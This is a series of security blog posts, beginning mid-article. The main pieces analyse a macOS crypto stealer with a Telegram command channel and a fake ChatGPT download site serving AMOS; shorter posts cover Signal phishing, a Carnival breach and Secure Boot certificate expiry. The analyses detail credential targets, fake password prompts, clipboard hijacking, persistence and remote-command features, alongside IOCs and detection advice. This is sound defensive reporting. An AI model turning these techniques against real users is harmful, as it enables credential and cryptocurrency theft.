• macOS native browser data: Safari cookies, history, and form values

2. Cryptocurrency wallets

This appears to be the script’s primary focus.

It targets desktop wallet applications including Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, and Tonkeeper.

It also targets browser-extension wallets across several ecosystems:

• Bitcoin: Xverse, Leather, UniSat, Alby, and Wizz
• Solana: Phantom, Solflare, Backpack, Nightly, MagicEden, Sollet, and Slope
• EVM wallets: MetaMask, Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin, and XDEFI
• Cosmos: Keplr, Station, and Cosmostation
• Other ecosystems: Yoroi, Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos, and Temple

3. Password managers and security tools

The malware targets local storage and settings for several password managers, including LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, and Buttercup.

It also looks for data associated with 2FA and authenticator tools, including Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, and FreeOTP.

4. Communication and social apps

The script attempts to copy session data and local storage for Telegram Desktop and Discord, including Discord Canary and Discord PTB.

5. Developer and cloud tools

It looks for credentials and configuration files in the user’s home directory, including:

• AWS CLI configurations in .aws
• SSH keys in .ssh
• GnuPG keys in .gnupg
• Kubernetes configs in .kube
• Shell and Git files including .zshrc, .zsh_history, .bash_history, and .gitconfig

6. Productivity apps and general files

The script copies the local Apple Notes database, NoteStore.sqlite.

It also looks for browser-extension data related to shopping and productivity tools, including Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, and Google Keep.

Finally, it scans Desktop, Documents, and Downloads for files with extensions including .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, and .env, under a size cap.

What it does with the stolen data

The malware tries to capture the user’s account password directly. An osascript dialog titled “System Preferences” asks the user to re-enter their password “to continue.” The script validates each attempt against dscl . authonly before saving it, so it only stops once it has a working credential.

For exfiltration, it archives the staged data with macOS’s own ditto, likely because it is always present, unlike zip. To stay under Telegram’s 50 MB upload limit, it breaks larger archives into 49 MB chunks with split before sending each part.

It establishes persistence by writing a LaunchAgent plist into the user’s ~/Library/LaunchAgents, backed by a hidden support directory, and loading it with launchctl so the implant runs again at every login.

The clipboard hijack is a live background loop. A clip_watch function continuously inspects the clipboard, matches Bitcoin, Ethereum, and Solana address formats by regex, reports the original address to the command-and-control channel, and overwrites the clipboard with the attacker’s address via pbcopy.

That means the substitution happens silently between copy and paste.

Finally, the malware can be controlled interactively. A c2_loop polls the Telegram bot for commands and supports a full operator toolkit:

• /info for system details
• /exec for arbitrary shell commands
• /clipboard to read current clipboard contents
• /download to pull specific files
• /exfil to rerun the theft module
• /selfdestruct to wipe traces

This makes the Telegram channel a real-time remote-control link, not just a one-way drop.

Living off the land, and off Telegram

The pattern here is familiar and getting more common: lean on tools that are already trusted.

The delivery abuses Apple’s own Script Editor. The configuration hides behind a trivial XOR rather than packed binaries. The command channel rides Telegram’s Bot API, which can pass through egress filters that would flag an unknown server.

None of these pieces is novel on its own. The effectiveness comes from stacking legitimate-looking components so no single step trips an alarm.

Detection opportunities

The lessons here are less about the lure and more about the technique itself.

Script Editor executing a one-line base64 do shell script that immediately quits is a strong behavioral signal, and a far better detection target than the disposable stage-one file. So is a hidden /tmp/.sysupd.sh downloaded by curl and launched in the background.

Browsers and download surfaces could treat .applescript files arriving from the web with the same suspicion as executables. And Telegram remains an under-addressed command-and-control medium that bot-token abuse reporting could disrupt at the source.

Indicators of Compromise File hashes (SHA-256)

• 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

Network indicators

• update-bluewallet[.]com
• projects2026box[.]com

Clipboard-hijack addresses

• BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
• ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA
• SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Does it sometimes take your phone a few minutes to accomplish one simple task? That can be wildly frustrating.

But you’re in luck, because we’ve got a free tool that scans your phone for leftover files, temporary data, outdated caches and helps you clean up all that junk.

Introducing our Android Junk Cleaner. The new, free feature in our app clears out your unused files, helps protect your privacy, frees up valuable storage space, and improves your device’s performance. 

Start cleaning up your phone now. Download the app and clear out your junk.

How to clean up your Android device

1. Open the Malwarebytes app on your Android device

2. On the Junk Cleaner card, tap Clean

If this is your first time using Junk Cleaner, you’ll need to grant permissions:

• Allow file access: Tap Give permission, then turn on Allow Malwarebytes to manage all files.
• Allow usage access: Tap Go to Settings. Under App usage data, tap Malwarebytes, then turn on Permit access to app usage data. If the toggle is grayed out, follow the on-screen instructions to enable access.

3. Return to the Junk Cleaner screen and tap Refresh

4. Tap Select all, then Clean all

Once the cleanup is complete, you’ll see an “All clean” screen showing how much storage space you freed up.

Prefer to remove files individually? Just select the files or folders you want to delete, then tap Clean.

Important: Once files are deleted with Junk Cleaner, they cannot be recovered using the Malwarebytes app.

Get started

Download Malwarebytes for Android and start cleaning up your device today.

Not a Malwarebytes user yet? No problem, it’s never too late to start. Whether you’re looking for yourself, your family, or a small business, we have a range of plans to choose from.

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

Last week on Malwarebytes Labs:

• Payment apps are watching what you say (Lock and Code S07E11)
• Scammers pretending to be Microsoft had help from US executives
• 700+ education and tech websites hijacked in huge ClickFix malware campaign
• Fake software on GitHub and SourceForge distribute Deno RAT
• Fake LinkedIn emails abuse Adobe to track victims
• Company bragged phone mics could listen to conversations. They couldn’t.
• Kali365 phishing kit bypasses MFA and steals Microsoft logins
• Fake ChatGPT download site infects Windows and Mac users with malware
• Your Windows PC has a security deadline in June 2026
• Carnival confirms data breach impacting nearly 6 million
• Signal users targeted in backup-stealing phishing attacks

Stay safe!

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

This week on the Lock and Code podcast…

In the United States today, you can have your bank account closed, your credit cards cancelled, and your online payments revoked for any number of crimes, like funding terrorism, engaging in money laundering, or violating sanctions.

Sensible, right? Well, you can also face financial ruin for teaching poetry.

That’s what seemingly happened to a Persian poetry teacher from Detroit whose accounts were flagged for “sanctions violations” because his students wrote “Persian classes” in their Venmo memos. There’s also the story about the naked yoga practitioners who lost their payment processor for 60 days, forced to rebuild a subscriber list from scratch. And we can’t forget the San Diego cannabis journalist cut off from Stripe—and from a paid Substack newsletter—because of the payment platform’s rules that prohibit the promotion of the sale of cannabis.

This is “financial censorship,” and it often happens when a bank, credit card provider, or payment app decides that a customer is too risky to serve. But “risky” doesn’t always mean “illegal,” and when a major financial institution errs towards caution about what a customer is saying, advocating for, representing, or publishing, a lot of innocent people can be hurt in the process.

That’s what the digital rights activist Rainey Reitman learned in writing “Transaction Denied: Big Finance’s Power to Punish Speech.” As Reitman explained about these hugely impactful decisions:

“Even if they are well-intentioned, the financial systems can end up pulling in a lot of people that are not the actual target… Sometimes we talk about this as dolphins in the fishing lines.”

These decisions are difficult to fight, frustratingly opaque, and nearly impossible to reverse. Compounding the problem is that that there aren’t enough alternatives available for the financially censored to easily regain their freedom.

The reality for hundreds of millions of people in this country is that about a dozen companies control all their finances. People mostly bank with Chase, or Bank of America, or Citigroup, or Wells Fargo. They mostly use credit cards assigned by Visa, MasterCard, American Express, or Capital One. And they mostly send money to one another and to small businesses using services like PayPal, Venmo, Cash app, and Square.

For most people, these companies are supposed to operate in the background of their lives, providing reliable, secure financing to sustain and manage their livelihoods. But in practice, these companies can become quite interested in what you say online, what payments you receive each month, and the locations those payments arrived from.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Reitman—who is also the president and a co-founder of the Freedom of the Press Foundation—about the real stories of those who have been financially censored, why financial companies cut off customers for legal speech, and how a single company’s decision can create cascading consequences that feel impossible to fight.

“They’d be locked out of Venmo, then they’d be locked out of PayPal—which is connected to Venmo—and then they’d suddenly lose their Chase Bank account. You could see that in a lot of instances, losing one form of access to the financial system, it could result in a pattern where they would be losing access repeatedly.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.

A new phishing campaign is targeting Signal users by attempting to steal their backup recovery keys to access encrypted message archives. 

The attack is initiated by a text message pretending to come from Signal Support.

“Action Required: Data Recovery Needed
Your Signal account data (message and media) Is at risk of permanent loss due to a sync issue.
To avoid losing your messages and media:
1. Go to Settings -> Backups -> Configure -> Enable backups -> View Recovery Key.
2. Copy the recovery key to your clipboard.
3. Paste the key into this chat.
This links your existing backup to your account. Failure to do this may result in losing access to your account and all stored data.”

There are a few red flags in this message:

• The “Name not verified” label under the sender
• Repeated threats of losing all your data
• Pasting the key into the chat. Signal Support would never ask for your recovery key

Scam or legit? Scam Guard knows.

TRY IT NOW

The attack exploits Signal’s Secure Backups feature, which allows users to store encrypted archives of their conversations on Signal’s servers. These backups are protected by a 64-character recovery key.

That key should never leave the user’s device and is never shared with Signal’s servers. If hackers obtain this key and gain control of a victim’s account, they can download and decrypt the entire message history.

For an attacker, that’s even better than hijacking an account, which would only give them access to future messages.

For now, the attacks appear to be targeted. We have seen reports from journalists, reports of attacks on Chinese activists, and warnings from a researcher who investigates cyberattacks against journalists, dissidents, and human rights activists. But now that other cybercriminals are aware of this opportunity, the tactic could spread rapidly.

How to stay safe

Signal explicitly states that it will never reach out to users first and will never request registration codes, PINs, or recovery keys. 

• Treat unsolicited messages from “Support” as suspicious by default. Legitimate support for apps like Signal and WhatsApp do not ask you, in a chat message, to send back verification codes, PINs, or passwords.​ If you receive a warning about account problems, do not follow links in the message. Open the app’s settings directly or visit the official website through other means.
• Never share any secret codes, multi-factor authentication keys, or app PINs. SMS codes are there to prove that you control a phone number. Anyone who has the code can pretend to be you. App‑specific PINs or passcodes are there to protect account changes. Consider anyone asking for them to be a scammer.
• Use the extra security features these apps offer. Enable options like registration lock, registration PIN and device‑change alerts so that your account cannot be silently re‑registered without an extra secret. Store your PIN in a password manager instead of choosing something easy to guess or reusing a code. This reduces the risk of social engineering or shoulder‑surfing.
• Another useful feature is disappearing messages. Short‑timer and disappearing messages reduce how much content is available if an attacker gains access to a chat later, or obtains long‑term access to a device or backup. They are not a complete solution, but they can limit the damage.
• Use Malwarebytes Scam Guard on your device or online to check messages. Malwarebytes Scam Guard identified this message as a phishing attempt and provided further information about how to proceed.

Scammers know more about you than you think. 

Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in. 

Download for iOS → Download for Android → 

Carnival Corporation, parent of Carnival Cruise Line, is sending out fresh “Notice of Cybersecurity Event” letters dated May 27, 2026. If you feel like you’ve read that sentence before, you’re not imagining things. Over the last decade, the world’s largest cruise operator has accumulated a worrying track record of breaches, ransomware incidents, and regulatory penalties, with this 2026 incident adding yet another entry to an already lengthy cybersecurity history.

There are several data breaches involving Carnival Corporation or one of its subsidiaries in our database.

Between 2019 and 2021 alone, Carnival reported four separate cybersecurity events to the New York Department of Financial Services. These included two ransomware attacks and a phishing incident in which attackers deployed malware, accessed and encrypted internal systems, and stole personal customer and employee information.

In this latest case, an attacker used social engineering to trick a Carnival employee into granting access to part of the company’s IT systems on April 14, 2026. By April 22, they used a compromised account to access a “limited portion” of Carnival’s IT systems, where they were able to copy personal data before being blocked.

According to the data breach notice filed in Maine, a total of 5,995,277 people were affected. Carnival determined that the intruder had illegally copied files containing personal information and is now writing to affected individuals to tell them that “data elements” relating to them were obtained.

Researchers cited by Gblock say the stolen data appears to include:

• Full names
• Email addresses
• Dates of birth
• Genders
• Mariner Society membership status and tier
• Internal customer identifiers

The template letter does not list specific data fields. Instead, it uses a placeholder:

“We have determined that your <<data elements>> were obtained.”

This strongly suggests that Carnival is populating each letter with data categories relevant to that particular individual, a common pattern in large breaches where people may have provided different information at different times.

Furthermore, the letters contain the usual content about the speed with which the company acted, involving third‑party experts, and frame the affected systems as a limited subset of the environment. For recipients, the important fact is not how limited the breach was from the company’s point of view, but whether the exposed information could be used for identity theft, fraud, or highly convincing phishing attacks.

Breaches happen every day. Don’t be the last to know.

SEE PLANS

We do know from past Carnival incidents that exposed data has included names, addresses, dates of birth, passport numbers, health information, and payment details. In previous breaches affecting cruise lines, compromised data has ranged from basic contact details to Social Security numbers and credit card information. Carnival has not publicly disclosed the full categories of data involved in the 2026 incident, but given that this 2026 event again involves “personal information” copied from internal systems, it is reasonable to treat it as a serious privacy incident, even if the exact mix of data varies per person.

The attack was claimed by extortion group ShinyHunters, which is known to steal data and then ask for a ransom. If the victim does not agree to the terms, the data will be published and/or sold to the highest bidder.

ShinyHunters offers Carnival data for download

From a cybercriminal’s perspective, cruise industry data is highly prized. Cruise passengers are often relatively wealthy, and passenger records can combine identity data (names, addresses, dates of birth, passport numbers), contact data (emails, phone numbers), and potentially payment data (card numbers and sometimes bank details), making them valuable for identity theft, targeted phishing, and fraud.

What to do if you’re affected

To mitigate the fallout, Carnival is offering a complimentary 24‑month TransUnion credit‑monitoring package, delivered via the MyTrueIdentity platform and supported by Cyberscout for fraud assistance.

Be cautious of emails, texts, or calls claiming to come from Carnival or credit-monitoring providers, as cybercriminals often exploit breaches with phishing scams. Read our advice on what to do when you find out you’re involved in a data breach.

What do cybercriminals know about you?

Use Malwarebytes’ free Digital Footprint scan to see whether your personal information has been exposed online.

SCAN NOW

A Secure Boot certificate refresh is rolling out across supported Windows devices through Windows Update. In June 2026, the Secure Boot certificates that have shipped inside Windows since 2011 begin to expire, and Microsoft is replacing them with new 2023-dated certificates.

The good news: If you keep your PC updated, you probably won’t need to do anything. The bad news: Some older devices may not transition cleanly. Your PC won’t suddenly stop working, but over time it could miss important boot-level security protections without you realizing it.

Here’s what’s going on, why it matters, and how to check that your machine is on the right side of the deadline.

What is Secure Boot, and what’s expiring?

Secure Boot is a UEFI firmware feature built into virtually every PC sold since around 2012. It runs before Windows even starts loading, and its job is to verify that the boot loader and early boot components have been signed by a trusted party. If something tries to insert itself into the boot chain that isn’t on the trust list—a bootkit, for example—Secure Boot refuses to let it run.

The “trusted party” part is the crucial bit. Trust is established through cryptographic certificates baked into your motherboard firmware. The current certificates were issued in 2011 and are now reaching expiration. Three specific certificates are involved:

• Microsoft Corporation KEK CA 2011: expires June 24, 2026
• Microsoft UEFI CA 2011: expires June 27, 2026
• Microsoft Windows Production PCA 2011: expires October 19, 2026

Microsoft is replacing them with a 2023-dated set, including Windows UEFI CA 2023 and Microsoft Corporation KEK 2K CA 2023. According to Microsoft engineers speaking during a March 2026 AMA session, the new certificates are valid until 2038, and a separate post-quantum cryptography transition is planned for around 2030 for future hardware.

“Will my computer stop working?”

No. This is the single most important thing to understand, because the rumor mill has been louder than the facts.

If the deadline arrives and your PC is still running on the 2011 certificates, Windows will still boot, Windows Update will still work, and your PC will continue functioning normally.

What changes is that, in Microsoft’s own words, the device “will no longer be able to receive new security protections” for the early boot process, including updates to Windows Boot Manager, Secure Boot databases, revocation lists, and mitigations for newly discovered boot-level vulnerabilities.

In plain English: Your PC becomes harder to protect over time. It’s protected against today’s known boot threats, but not necessarily against the ones that will be discovered next month or next year.

That’s a problem because bootkits operate underneath Windows and antivirus software. They run before anything else and can disable the security tools that would normally catch them.

The BlackLotus problem

If you want a concrete example of why boot-level security matters, look at BlackLotus.

BlackLotus is a UEFI bootkit that emerged on hacking forums in 2022 and was confirmed in the wild by researchers in early 2023. It exploited CVE-2022-21894, nicknamed “Baton Drop,” to bypass Secure Boot on fully patched Windows systems. Once installed, it could disable BitLocker, Hypervisor-Protected Code Integrity (HVCI), and Microsoft Defender before Windows fully loaded.

Microsoft addressed the underlying flaw in CVE-2023-24932, but fixing vulnerable boot managers safely is complicated. Revoking the wrong boot components can leave systems unbootable, which is why Microsoft has rolled out protections gradually over several years.

The 2026 certificate rollover is a planned lifecycle event (the 2011 certificates were always going to expire), but it also enables the broader Secure Boot hardening Microsoft has been doing in response to vulnerable boot managers and attacks such as BlackLotus.

With the new trust anchors in place, Microsoft can continue rolling out newer 2023-signed boot components and safely revoke vulnerable ones as new threats emerge. Devices that don’t make the transition may eventually miss those future protections.

How the rollout works

Microsoft is using a staged rollout designed to avoid breaking systems.

A scheduled Windows task runs roughly every 12 hours and applies the update in stages:

1. Add the new Windows UEFI CA 2023 to the firmware’s signature database.
2. If the old 2011 third-party certificate is still present, add the Microsoft UEFI CA 2023 and Microsoft Option ROM UEFI CA 2023 alongside it.
3. Add the new Microsoft Corporation KEK 2K CA 2023 key.
4. Update the Windows Boot Manager to one signed by the new certificate. This step is deferred until the next natural reboot.

Microsoft’s IT pro guidance estimates the full process takes roughly 48 hours and one or more restarts to complete. Each step must succeed before the next one runs, so a device can sit partway through the sequence for a while if (for example) it’s waiting on a firmware update or a scheduled reboot.

For most home users, this happens silently in the background through normal cumulative updates.

Starting with the April 2026 Windows update, the Windows Security app includes updated Secure Boot status information under Device security that shows whether the new certificates have been applied successfully.

What could go wrong

Most systems will transition without problems, but there are some known trouble spots:

• Older PCs with outdated firmware. Some older UEFI firmware implementations don’t properly support the new certificates. These systems may require a BIOS or firmware update from the manufacturer before the transition can complete.
• PCs that bypassed Windows 11 requirements. If Secure Boot was disabled to install Windows 11 using unofficial workarounds, the new certificates cannot be applied correctly.
• Legacy BIOS / CSM systems. Devices running Legacy BIOS (or UEFI with Compatibility Support Module enabled) aren’t using Secure Boot at all, so they’re outside the scope of this update entirely.
• Custom firmware and weird configurations. Some custom or unusual firmware configurations may trigger a BitLocker recovery prompt after the Secure Boot variables change. Microsoft has been careful to note that BitLocker itself is not being disabled, but users should have their recovery keys handy just in case.

Windows Latest reported seeing update failures on thousands of PCs with outdated firmware during testing. Microsoft’s own guidance more broadly warns that firmware, platform, and OEM limitations can block the transition. In many cases, Windows Security will flag affected systems with yellow or red status warnings.

What home users should do

For most people, the advice is straightforward:

• Keep Windows fully up to date. Microsoft is rolling the new certificates out through normal Windows updates, and most home users won’t need to do anything beyond installing monthly updates.
• Check your Secure Boot status (the text, not just the color). Open Windows Security > Device security > Secure Boot. A green badge with the text “Secure Boot is on, preventing malicious software from loading when your device starts up.” is the all-clear. Microsoft warns that a green checkmark alone doesn’t confirm the new certificates have been applied.
• If your device is older, check for a BIOS/firmware update from your manufacturer. Some systems need them before the Secure Boot update can complete properly. This is especially important for PCs built before 2024.
• Don’t disable Secure Boot to “fix” something. Disabling Secure Boot is exactly the wrong response—it removes the protection entirely rather than updating it. Some game anti-cheat systems and older apps ask users to do this.
• Don’t panic about the new SecureBoot folder. Windows 11’s May 2026 cumulative update (KB5089549) creates a folder at C:\Windows\SecureBoot containing example PowerShell scripts intended for IT administrators. It’s not malware, it’s expected, and you don’t need to delete it.
• Use up-to-date, real-time anti-malware protection that can detect threats at the OS level even if something does slip past Secure Boot.

What IT teams should do

If you manage a fleet, Microsoft has published extensive guidance and the work is more involved. The short version:

• Inventory your devices now. Pull the manufacturer, model, BIOS version and date, baseboard product, and Secure Boot status across the fleet. Microsoft provides a PowerShell sample script at aka.ms/GetSecureBoot that surfaces the relevant registry keys and event IDs.
• Watch Event IDs 1801 and 1808. Event ID 1808 confirms the new certificates are in place. Event ID 1801 means the device has not completed the update.
• Test before broad rollout. Microsoft recommends testing at least four devices per unique manufacturer/model/firmware combination. Some systems may need an OEM firmware update before they can accept the new certificates.
• Choose one deployment method per device. Use registry keys, Group Policy, WinCS command-line tools, or Intune/ConfigMgr scripts, but don’t mix methods on the same machine.
• Pay attention to PXE imaging and Hyper-V. SCCM/MECM PXE servers may need a re-signed boot.wim, and Hyper-V hosts may need updating before new VMs are created with the 2023 KEK in the firmware template.
• Document devices that can’t be updated. Older hardware without OEM firmware support may need to be replaced before the deadline or formally accepted as an exception with compensating controls. These devices will keep working, but they may miss future boot-level protections.

The bottom line

This is one of those security events that won’t generate a dramatic incident on June 24, 2026. Nothing visible will break that day.

The risk is what happens in the months and years after. Devices that fail to transition to the new trust chain may slowly fall behind on future boot-level protections as Microsoft continues responding to threats like BlackLotus and other bootkits.

For most home users, Windows Update will handle the transition automatically. Your main job is to keep your system updated and verify Secure Boot status before the deadlines arrive.

If your hardware is older, now is a good time to check whether your manufacturer still provides firmware updates—and whether your PC is ready for the next decade of Secure Boot protections.

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

A convincing fake website is impersonating OpenAI’s ChatGPT download page and infecting visitors with malware designed to steal passwords, browser data, cryptocurrency wallets, and other sensitive information.

The site, openew[.]app, closely mimics OpenAI’s real ChatGPT download experience and offers what appear to be official desktop apps for both Windows and macOS. Instead, Windows users receive a credential-stealing malware loader, while Mac users get Atomic Stealer (AMOS), a well-known macOS malware family associated with cryptocurrency theft.

The dual-platform setup is what makes the operation notable. Clicking the Windows download delivers a fake installer that opens a back channel to an attacker-controlled server. Clicking the macOS button delivers malware that steals browser passwords, cookies, Telegram sessions, cryptocurrency wallets, and other sensitive files. It also attempts to replace legitimate Ledger and Trezor wallet apps with trojanized versions.

If you only download ChatGPT from OpenAI’s official download page or the Microsoft Store, you were not the target here. But if you searched for “ChatGPT download” and clicked an ad or unfamiliar result, you may have given attackers access to your online accounts, browser sessions, saved passwords, and potentially your cryptocurrency holdings.

Technical analysis

The domain, openew[.]app, closely resembles OpenAI’s real ChatGPT download experience. It uses a dark theme, OpenAI-style branding, familiar marketing copy, and prominent download buttons for macOS and Windows.

The .app top-level domain is operated by Google and requires HTTPS connections, meaning browsers display the familiar padlock icon without obvious certificate warnings.

The most important detail is the dual-platform setup. Real software vendors provide separate installers for Windows and macOS, and this fake site does exactly the same thing.

Clicking the Windows button delivers Chat_GPT.exe, while clicking the macOS button downloads a disk image containing ChatGpt.dmg.

The Windows malware

Chat_GPT.exe is built almost entirely from off-the-shelf parts. The installer uses Inno Setup, a free open-source toolkit used by thousands of legitimate Windows products. Inside is an Electron application skeleton—the same Chromium-based framework used by apps like Slack and Discord—bundled with standard support libraries publicly available from the Electron project.

When the victim runs the installer, it creates files under %APPDATA%\LeronApplication, launches EApp.exe, and spawns PowerShell with the flags -ExecutionPolicy Unrestricted -Command -. The trailing dash tells PowerShell to read commands from standard input, meaning the malicious instructions never touch the disk where scanners might detect them. Behavioral telemetry recorded HTTP traffic to 188.137.246.189 using a /laravel.php?api=api&hash=...&message=... endpoint, alongside injection-like activity and service/autorun persistence signals. Nine of 69 antivirus engines flagged the file as malicious at the time of analysis. The persistence evidence is better read as behavioral tradecraft than proof of a durable install, but the overall pattern is familiar commodity stealer/dropper territory: cheap, modular, and effective rather than technically novel.

CAPTCHA displayed after the fake app launches, used to confirm that a real user is running it. The macOS malware: Atomic Stealer (AMOS)

The macOS payload sits at the premium end of the commodity-malware market. It’s Atomic Stealer, also known as AMOS, a malware-as-a-service platform documented since 2023, including in our 2024 coverage of an updated version.

The identification is fairly clear-cut. The sandboxed sample matches well-known AMOS behavior patterns: a long AppleScript chain passed to the macOS scripting engine, a silent password validation attempt using macOS directory-service commands, and—if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” complete with the familiar lock icon. Whatever the user types is validated against the same command. If it matches, the malware captures the user’s login password in cleartext.

From there, it follows a familiar AMOS playbook. It copies the macOS keychain, harvests cookies and saved logins from 12 Chromium-based browsers plus Firefox and Waterfox, and extracts Telegram session data. It also scans 16 cryptocurrency wallet directories, including Ledger Live, Trezor Suite, Exodus, Electrum, and Sparrow. Finally, it searches Desktop and Documents folders for files with extensions like .wallet, .seed, .key, and .kdbx. The collected data is compressed into a temporary archive and sent to a hardcoded server.

The wallet replacement feature is especially dangerous

There’s one more part of the macOS payload, and it’s likely the feature that justifies the price tag. After the initial data theft, the script downloads trojanized versions of Ledger Live, Ledger Wallet, and Trezor Suite from a second server. It then attempts to delete the legitimate wallet apps and replace them with the attacker’s versions.

If the user’s password was captured earlier in the attack chain, the script uses sudo to force the replacement. If not, it falls back to a standard rm -rf deletion attempt, which can still succeed if the apps are installed in a user-writable location. Either way, the next time the victim opens what appears to be their wallet software, they may actually be launching the attacker’s replacement.

This behavior has been documented in previous public AMOS analyses and makes the operator’s intent fairly clear. AMOS is heavily associated with cryptocurrency theft, and the macOS side of this campaign appears focused on exactly that outcome.

What the operation cost to build

This is where the AI angle becomes interesting, because the Windows and macOS sides of the operation sit at very different price points.

The domain openew.app probably cost the operators around $15 a year through a normal registrar. The .app domain requires HTTPS by default, making it easy for operators to present the reassuring browser padlock users associate with legitimate websites. The landing page itself is simply a copy of OpenAI’s real download page, something modern cloning tools can reproduce in minutes.

On the Windows side, most of the tools are cheap or free. Inno Setup is free. Electron is free. The Chromium support files are public downloads. The server infrastructure appears to rely on low-cost commodity malware tooling and a basic VPS that could cost only a few dollars a month. Altogether, the Windows side of this operation could plausibly have cost under $100 to set up initially.

The macOS side is very different. AMOS has reportedly rented for around $3,000 per month, paid in cryptocurrency. By comparison, Lumma—a popular Windows infostealer often treated as a similar product—has historically advertised entry tiers around $250 per month.

That price gap says a lot. The operators clearly believe a successful Mac infection is worth much more money than a typical Windows infection.

The likely reason is simple: AMOS is designed specifically for cryptocurrency theft, including the wallet-replacement behavior seen in this campaign. The operators are betting that a meaningful number of Mac users hold cryptocurrency.

Getting victims to the site is probably the only major ongoing cost, and that’s where the AI branding becomes valuable. Search ads, SEO poisoning, YouTube spam, and links shared in AI-focused Discord and Telegram communities can all drive traffic to fake download pages. Some of those channels cost money. Others are almost free.

Why attackers are going after AI brands

Most established software already has trusted download habits built around it. If you want Chrome, you probably know to go to Google. If you want Photoshop, you go to Adobe. People already know where the real download lives.

AI tools are different because most users are still installing them for the first time, and that means relying on search results, ads, YouTube links, or social posts to find the download page. That creates an ideal environment for fake sites.

Over the last two years, products like ChatGPT, Claude, Gemini, Sora, DeepSeek, Antigravity, and many others have launched or changed rapidly. Every new release creates another wave of users searching for “download ChatGPT” or “install Claude” without knowing the official URL. That search traffic is exactly where attackers set up shop.

The fake pages also do not need to be especially sophisticated because legitimate AI product pages are already minimal by design: a modern layout, a logo, and a large download button. Openew[.]app matches what users expect to see. There is no broken English or aggressive pop-ups here, just identical branding, copy, and the reassuring browser padlock.

What makes this kind of operation durable is how easily it can rotate brands. When the ChatGPT lure stops attracting clicks, the operators can reuse the same infrastructure around the next trending AI product. The malware behind the download button stays the same. Only the branding changes.

What AI vendors could do

Most major AI vendors, including OpenAI, already provide official download channels. The problem is visibility and user habit. Many users still search for “ChatGPT download,” where results can include official links, unofficial mirrors, and outright malicious sites.

Large consumer brands and banks often run aggressive brand-protection campaigns against fake ads and impersonation domains. AI vendors may need to do the same more consistently.

The other issue is discoverability. Official desktop-app links are often buried in settings menus or sidebars, while search engines are faster and more obvious. That’s exactly where the fake download sites are waiting.

What to do if you may have installed the fake app

If you recently installed something claiming to be ChatGPT from anywhere other than OpenAI’s official download page or the Microsoft Store, you may have been affected. From a different, clean device:

• Sign out of your important accounts using each service’s “sign out everywhere” option. This includes email, banking, cloud storage, GitHub, Discord, Telegram, and cryptocurrency exchanges.
• Change passwords starting with your primary email account.
• Rotate any API keys, SSH keys, and cloud credentials stored on the affected machine.
• If you hold cryptocurrency, move funds immediately using a separate clean device. On macOS specifically, do not open Ledger Live or Trezor Suite on the affected machine before reinstalling the operating system, as the wallet-replacement function may have succeeded.
• Monitor bank accounts and payment cards for suspicious activity.
• Reinstall the operating system. The Windows sample showed PowerShell command-and-control behavior, while the macOS payload may have captured the user’s login password. A clean reinstall is the safest recovery path.
• If this was a work device, contact your IT or security team immediately.

Closing thoughts

The reason this campaign is worth writing about is not the malware itself. Both payloads are already well documented. The Windows side is a commodity kit assembled from cheap, widely available parts. The macOS side is AMOS, a malware family that has been tracked since 2023.

What’s more interesting is the shape of the operation around that malware. A single fake site delivers two different payloads aimed at two different victim economics. Windows victims are positioned for broad monetization through credential and cookie theft. Mac victims are targeted more narrowly and lucratively through cryptocurrency theft, with operators apparently willing to spend thousands per month on tooling because the returns justify it.

The lure tying both sides together is the AI brand itself. Right now, AI product names generate huge amounts of first-time-download traffic from users who do not yet know the official URLs.

This is what a mature delivery business looks like. The interesting layer is not the binary, but the supply chain around it: the domain, certificate, clone page, traffic source, malware subscription, and exfiltration infrastructure. Each piece is cheap, modular, replaceable, and available off the shelf.

And the operators are not choosing between Windows and macOS. They are serving both from the same page, with payloads tuned to each platform’s economics. When one AI brand stops converting, they can simply swap the branding and reuse the same infrastructure around the next trending product.

AI hype will eventually fade. The kit probably will not.

Indicators of Compromise (IOCs)

File hashes (SHA-256)

• c9e0e6985dca3a179c9bdea4e7b38f7dc57fe00ecedc2fd634256fc53bf2de2d (Chat_GPT.exe)
• c0919e1999eaee67e67aeda0287722775afb04e9a9a0f727928b4d11265fb70b (ChatGpt.dmg)

Network indicators

• openew[.]app
• 188[.]137[.]246[.]189
• 192[.]253[.]248[.]181
• 172[.]94[.]9[.]250

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

When the Federal Bureau of Investigation (FBI) publishes a dedicated public service announcement about a new phishing kit, it’s worth paying attention to.

